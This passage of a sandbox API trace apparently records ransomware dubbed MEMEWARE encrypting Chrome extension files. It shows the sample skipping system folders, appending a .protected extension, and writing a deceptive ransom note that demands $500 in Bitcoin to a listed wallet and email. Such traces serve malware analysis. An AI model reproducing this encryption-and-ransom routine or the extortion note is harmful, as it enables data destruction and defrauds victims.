HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json") returned 164 [0083.488] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json") returned 164 [0083.488] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json") returned 164 [0083.488] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.488] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.495] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.495] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.495] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.495] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.495] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.495] CloseHandle (hObject=0x168) returned 1 [0083.496] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.protected") returned 174 [0083.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.protected")) returned 1 [0083.496] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.496] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.497] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\RESTORE_FILES.txt") returned 168 [0083.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.498] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.498] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.499] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.499] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.499] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.499] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.499] CloseHandle (hObject=0x164) returned 1 [0083.499] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.500] lstrcmpiW (lpString1="fa", lpString2="Windows") returned -1 [0083.500] lstrcmpiW (lpString1="fa", lpString2="Program Files") returned -1 [0083.500] lstrcmpiW (lpString1="fa", lpString2="Program Files (x86)") returned -1 [0083.500] lstrcmpiW (lpString1="fa", lpString2="$Recycle.bin") returned 1 [0083.500] lstrcmpiW (lpString1="fa", lpString2="System Volume Information") returned -1 [0083.500] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa") returned 150 [0083.500] lstrcmpW (lpString1="fa", lpString2=".") returned 1 [0083.500] lstrcmpW (lpString1="fa", lpString2="..") returned 1 [0083.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\*") returned 152 [0083.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.500] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.500] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.500] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.500] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.500] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\.") returned 152 [0083.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.500] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.500] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.500] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.500] lstrcmpiW (lpString1="..", lpString2="Program 
Files (x86)") returned -1 [0083.500] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.500] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\..") returned 153 [0083.500] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.501] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.501] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.501] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.501] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.501] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.501] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.501] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.501] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json") returned 164 [0083.501] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.501] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.501] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.501] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.501] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json") returned 164 [0083.502] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json") returned 164 [0083.502] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json") returned 164 [0083.502] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.502] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.504] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.504] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.505] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.505] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.505] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.505] CloseHandle (hObject=0x168) returned 1 [0083.505] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.protected") returned 174 [0083.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.protected")) returned 1 [0083.506] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0 [0083.506] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.506] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\RESTORE_FILES.txt") returned 168 [0083.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.506] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.507] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.507] lstrlenA (lpString="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") returned 684 [0083.507] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.507] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.508] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0083.508] CloseHandle (hObject=0x164) returned 1 [0083.508] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.508] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0083.508] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0083.508] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0083.508] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0083.508] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0083.508] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi") returned 150 [0083.508] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0083.508] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0083.508] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\*") returned 152 [0083.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.508] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.508] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.509] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.509] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.509] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.509] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\.") returned 152 [0083.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.509] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.509] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.509] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.509] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.509] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.509] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\..") returned 153 [0083.509] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.509] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.509] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.509] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.509] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.509] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.509] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json") returned 164 [0083.509] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.509] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.509] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.509] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json") returned 164 [0083.510] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json") returned 164 [0083.510] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json") 
